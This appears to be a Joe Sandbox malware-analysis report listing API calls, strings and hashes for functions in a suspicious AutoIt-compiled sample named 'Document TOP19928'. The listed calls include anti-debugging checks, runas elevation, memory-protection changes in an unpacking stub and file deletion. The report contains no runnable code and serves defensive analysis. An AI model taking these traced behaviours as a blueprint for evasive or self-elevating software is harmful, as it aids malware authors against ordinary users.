IsDebuggerPresent.KERNEL32 ref: 007D3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,008962F8,008962E0,?,?), ref: 007D3BFD

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 007E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007D3C26,008962F8,?,?,?), ref: 007E0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008893F0,00000010), ref: 0080D4BC
SetCurrentDirectoryW.KERNEL32(?,008962F8,?,?,?), ref: 0080D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00885D40,008962F8,?,?,?), ref: 0080D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0080D581

Part of subcall function 007D3A58: GetSysColorBrush.USER32(0000000F), ref: 007D3A62
Part of subcall function 007D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 007D3A71
Part of subcall function 007D3A58: LoadIconW.USER32(00000063), ref: 007D3A88
Part of subcall function 007D3A58: LoadIconW.USER32(000000A4), ref: 007D3A9A
Part of subcall function 007D3A58: LoadIconW.USER32(000000A2), ref: 007D3AAC
Part of subcall function 007D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AD2
Part of subcall function 007D3A58: RegisterClassExW.USER32(?), ref: 007D3B28

Part of subcall function 007D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A15
Part of subcall function 007D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A36
Part of subcall function 007D39E7: ShowWindow.USER32(00000000,?,?), ref: 007D3A4A
Part of subcall function 007D39E7: ShowWindow.USER32(00000000,?,?), ref: 007D3A53

Part of subcall function 007D43DB: _memset.LIBCMT ref: 007D4401
Part of subcall function 007D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D44A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0080D4B4
runas, xrefs: 0080D575

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 2719f7cbcb14e82b87da1f9c1c3b18abff9eb813a7dc59b67b3eeb96eb32c721
Instruction ID: 7e322772aef15547ef51dd6321948b7dd4821c4c01d97fe55a5efa4dba071bbf
Opcode Fuzzy Hash: 2719f7cbcb14e82b87da1f9c1c3b18abff9eb813a7dc59b67b3eeb96eb32c721
Instruction Fuzzy Hash: B751C170E18248EACF15BBF4DC09AED7B79FB04340B084167F559A23A2EA7C5655CB22

Function 007D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007D36D2
KillTimer.USER32(?,00000001), ref: 007D36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D371F
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D372A
CreatePopupMenu.USER32 ref: 007D373E
PostQuitMessage.USER32(00000000), ref: 007D375F

Strings

TaskbarCreated, xrefs: 007D3725

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 8dcc586e5f2cadc467685a7cdf5f5c1ecfa447e580126f63f76e93122659dae4
Instruction ID: 9b2628e573445f66b260f568f665c156e9559f9d425c0a25fe1954f03534050f
Opcode Fuzzy Hash: 8dcc586e5f2cadc467685a7cdf5f5c1ecfa447e580126f63f76e93122659dae4
Instruction Fuzzy Hash: 7A4107B1204645BBDF106BA8EC49B793B75FB04351F18012BF602D63E2EA7CED649663

Function 007D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007D4B2B

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

GetCurrentProcess.KERNEL32(?,0085FAEC,00000000,00000000,?), ref: 007D4BF8
IsWow64Process.KERNEL32(00000000), ref: 007D4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 007D4C45
FreeLibrary.KERNEL32(00000000), ref: 007D4C50
GetSystemInfo.KERNEL32(00000000), ref: 007D4C81
GetSystemInfo.KERNEL32(00000000), ref: 007D4C8D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: d42050ca5fa505f17f097de4ca42328ca034010b5de9df99b71d80f1022cf989
Instruction ID: 2c0ed613333ba568ea370f88adb8839f01d89dae197e55eaa536788de5ea7351
Opcode Fuzzy Hash: d42050ca5fa505f17f097de4ca42328ca034010b5de9df99b71d80f1022cf989
Instruction Fuzzy Hash: 0291B17154ABC0DBC731DB68C9511AABFF5BF36300B48495FD0CA93B42D239A908C729

Function 007D4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D4EEE,?,?,00000000,00000000), ref: 007D5010
LoadResource.KERNEL32(?,00000000,?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F), ref: 0080DD60
SizeofResource.KERNEL32(?,00000000,?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F), ref: 0080DD75
LockResource.KERNEL32(N},?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F,00000000), ref: 0080DD88

Strings

SCRIPT, xrefs: 007D5006
N}, xrefs: 0080DD85

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SCRIPT$N}
API String ID: 3473537107-3432425373
Opcode ID: 0d203d4eab4a089bc3dd6714bcbfc850aecfd5850ed7b7d80f023a2ab1d45380
Instruction ID: 286521a997317d77c8634f8de2f48f7929bba1bbc811fad1ab6f0385b65e4023
Opcode Fuzzy Hash: 0d203d4eab4a089bc3dd6714bcbfc850aecfd5850ed7b7d80f023a2ab1d45380
Instruction Fuzzy Hash: 0D115AB5200700BFD7218B65DC58F677BB9FBC9B12F208169F506C62A0DB65E8008661

Function 009090A0 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 009091DA
GetProcAddress.KERNEL32(?,00902FF9), ref: 009091F8
ExitProcess.KERNEL32(?,00902FF9), ref: 00909209
VirtualProtect.KERNELBASE(007D0000,00001000,00000004,?,00000000), ref: 00909257
VirtualProtect.KERNELBASE(007D0000,00001000), ref: 0090926C

Memory Dump Source

Source File: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: ed1f8c1f0ccf060699ddfb51019911613a87511ad523c7a1cd11b465f1fb7b94
Instruction ID: eb55adcb4bcd84302cf997bea33179fdd39f78a45fad333ae401e3630d3abb99
Opcode Fuzzy Hash: ed1f8c1f0ccf060699ddfb51019911613a87511ad523c7a1cd11b465f1fb7b94
Instruction Fuzzy Hash: 99510972B582535FD7209EBCCCC4660B7A9EB523247280739C6F6C73C7E7A459068760

Function 00834696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0080E7C1), ref: 008346A6
FindFirstFileW.KERNELBASE(?,?), ref: 008346B7
FindClose.KERNEL32(00000000), ref: 008346C7

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
Instruction ID: dbd3b94450a7410cdb7c84936b128844955b724105c0a5e3dcb90f95e538d35a
Opcode Fuzzy Hash: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
Instruction Fuzzy Hash: 76E0D8314145005B62106B38EC4E4EA775CFE57336F100715FA35C21F0F7B46D5085D6

Function 007DE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0081428C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 959908867c6bd9407926a4f7f200be2c7a59c2815efb4747bc3270393760f15b
Instruction ID: 638eaf15c6b3c687a45654066a217262f7391bc59064ca4ebd3bdac7efac58b3
Opcode Fuzzy Hash: 959908867c6bd9407926a4f7f200be2c7a59c2815efb4747bc3270393760f15b
Instruction Fuzzy Hash: 4AA27F74A04205CFCB25EF58C480AADB7B6FF58314F64806AE916AF351D739ED82CB91

Function 007E0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0BBB
timeGetTime.WINMM ref: 007E0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0FB3
TranslateMessage.USER32(?), ref: 007E0FC7
DispatchMessageW.USER32(?), ref: 007E0FD5
Sleep.KERNEL32(0000000A), ref: 007E0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 007E105A
DestroyWindow.USER32 ref: 007E1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E1080
Sleep.KERNEL32(0000000A,?,?), ref: 008152AD
TranslateMessage.USER32(?), ref: 0081608A
DispatchMessageW.USER32(?), ref: 00816098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008160AC

Strings

@GUI_CTRLID, xrefs: 00815364
@GUI_CTRLHANDLE, xrefs: 0081540E
@GUI_WINHANDLE, xrefs: 008153B9
@TRAY_ID, xrefs: 00815BB9
@COM_EVENTOBJ, xrefs: 0081591A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: a9cca9e0e7cbfe7451ae43f786beef7aa0c0049aa3ed439b802b418748ad13d9
Instruction ID: 20f8e8a44530ae96c0fc8e8ae4411ed3e540fb4870b264603b8d6d56daf6f448
Opcode Fuzzy Hash: a9cca9e0e7cbfe7451ae43f786beef7aa0c0049aa3ed439b802b418748ad13d9
Instruction Fuzzy Hash: 5AB2C370609741DFD724DF24C885BAAB7E9FF84304F14492EE58AD7291DB79E884CB82

Function 008393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008391E9: __time64.LIBCMT ref: 008391F3

Part of subcall function 007D5045: _fseek.LIBCMT ref: 007D505D

__wsplitpath.LIBCMT ref: 008394BE

Part of subcall function 007F432E: __wsplitpath_helper.LIBCMT ref: 007F436E

_wcscpy.LIBCMT ref: 008394D1
_wcscat.LIBCMT ref: 008394E4
__wsplitpath.LIBCMT ref: 00839509
_wcscat.LIBCMT ref: 0083951F
_wcscat.LIBCMT ref: 00839532

Part of subcall function 0083922F: _memmove.LIBCMT ref: 00839268
Part of subcall function 0083922F: _memmove.LIBCMT ref: 00839277

_wcscmp.LIBCMT ref: 00839479

Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AAE
Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008396DC
_wcsncpy.LIBCMT ref: 0083974F
DeleteFileW.KERNEL32(?,?), ref: 00839785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0083979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008397AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008397BE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 999de355fca8515391abadddcb56f6a1f456edcf4dd1902ac30475e9cfd4cd28
Instruction ID: 7f1dfa60ea206f3dc1e892d4526fd204b4512acd995ef10ab0c553627cf8056a
Opcode Fuzzy Hash: 999de355fca8515391abadddcb56f6a1f456edcf4dd1902ac30475e9cfd4cd28
Instruction Fuzzy Hash: A5C12DB190021DABDF11DF94CC85AEEB7BDFF94310F0040AAF649E6251EB749A448FA5

Function 007D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008962F8,?,007D37C0,?), ref: 007D4882

Part of subcall function 007F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007D72C5), ref: 007F0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0080ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0080ED32
RegCloseKey.ADVAPI32(?), ref: 0080ED70
_wcscat.LIBCMT ref: 0080EDC9

Strings

Include, xrefs: 0080ECE8, 0080ED29
\Include\, xrefs: 007D72C5
\, xrefs: 0080EDEC
Software\AutoIt v3\AutoIt, xrefs: 007D72FE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 675d8cf3c6e6a232f54933e595ac27d32ab9a13294de183280d9efc2e909a8e4
Instruction ID: bdccf501adee1d848c3f6260d0e6b6e68582c8ad70ddbf440302164cd254b02b
Opcode Fuzzy Hash: 675d8cf3c6e6a232f54933e595ac27d32ab9a13294de183280d9efc2e909a8e4
Instruction Fuzzy Hash: 10716A71528305DAC314EFA5DC858ABBBF8FF84350B48492FF546C32A1EB349948CB62

Function 007D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3A62
LoadCursorW.USER32(00000000,00007F00), ref: 007D3A71
LoadIconW.USER32(00000063), ref: 007D3A88
LoadIconW.USER32(000000A4), ref: 007D3A9A
LoadIconW.USER32(000000A2), ref: 007D3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AD2
RegisterClassExW.USER32(?), ref: 007D3B28

Part of subcall function 007D3041: GetSysColorBrush.USER32(0000000F), ref: 007D3074
Part of subcall function 007D3041: RegisterClassExW.USER32(00000030), ref: 007D309E
Part of subcall function 007D3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
Part of subcall function 007D3041: LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

0, xrefs: 007D3B06
#, xrefs: 007D3B0D
AutoIt v3, xrefs: 007D3B17

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 841884114aee5d8e9c1fbfb2297ee3c2c5e310e00207e608fd6d1687e3ebeb6c
Instruction ID: abe8cebe0e3f9710b1afc3cc2b70567f5b08676d7e0b9933019d41ba96c4349a
Opcode Fuzzy Hash: 841884114aee5d8e9c1fbfb2297ee3c2c5e310e00207e608fd6d1687e3ebeb6c
Instruction Fuzzy Hash: 04212B71900304AFEB10AFE4EC49B9D7FF5FB08711F04416BF604A62A1E3BA56649F94

Function 007D3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0080D44E
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007D37C0
CMDLINE, xrefs: 007D3834
CMDLINERAW, xrefs: 007D380D
/AutoIt3ExecuteLine, xrefs: 007D38B9
/AutoIt3OutputDebug, xrefs: 007D38A4
/ErrorStdOut, xrefs: 007D388F
/AutoIt3ExecuteScript, xrefs: 007D38CE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$@$CMDLINE$CMDLINERAW
API String ID: 1825951767-534949719
Opcode ID: 75a4b4f771cab8b14acf1159f2bcf959efc0af39435e38d5ebda56c92dce458b
Instruction ID: d334d6745f99a5d678f8f9ae44e8d300a95bb2c679e5339679509d9befafe4b8
Opcode Fuzzy Hash: 75a4b4f771cab8b14acf1159f2bcf959efc0af39435e38d5ebda56c92dce458b
Instruction Fuzzy Hash: C1A13D7291022DDACB05EBE0CC99EEEB778FF14304F44052AE516B7291EB795A09CB61

Function 007D3015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3074
RegisterClassExW.USER32(00000030), ref: 007D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

+, xrefs: 007D305D
0, xrefs: 007D3056
AutoIt v3 GUI, xrefs: 007D3090
TaskbarCreated, xrefs: 007D30A4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
